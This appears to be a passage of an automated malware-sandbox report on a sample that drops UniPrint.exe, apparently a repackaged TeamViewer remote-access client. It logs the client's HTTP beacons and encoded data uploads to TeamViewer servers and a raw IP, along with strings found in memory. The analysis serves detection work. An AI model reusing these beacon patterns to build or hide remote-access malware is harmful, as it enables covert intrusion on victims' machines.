Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: unknown TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=100000012
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001N&
Source: UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001v
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002l
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000001&client=DynGate
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGate
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGated
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000003.00000002.538052811.0000024FB000E000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.295831421.00000000057A6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001
Source: UniPrint.exe, 00000004.00000003.295831421.00000000057A6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001ayTo-UPnP-E
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001q
Source: UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001&%
Source: UniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001ZqcGy
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082859&client=DynGate&p=10000002
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002er12.teamviewer.com
Source: UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/din.aspx?s=40082873&client=DynGate&p=10000002W
Source: UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5Mko
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6s
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp String found in binary or memory: http://master12.teamviewer.com/dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeq
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr12.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=7
Source: UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr12.teamviewer.com/din.aspx?s=4082873&client=DynGate&p=100
Source: wogZe27GBB.exe, wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.TeamViewer.com/help
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000002.00000002.294871479.0000000002870000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.349624220.0000000002830000.00000004.00000001.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000003.344077474.00000000028E1000.00000004.00000001.sdmp, UniPrint.exe, 00000012.00000002.372091300.0000000002860000.00000004.00000001.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000003.370863061.0000000002831000.00000004.00000001.sdmp String found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
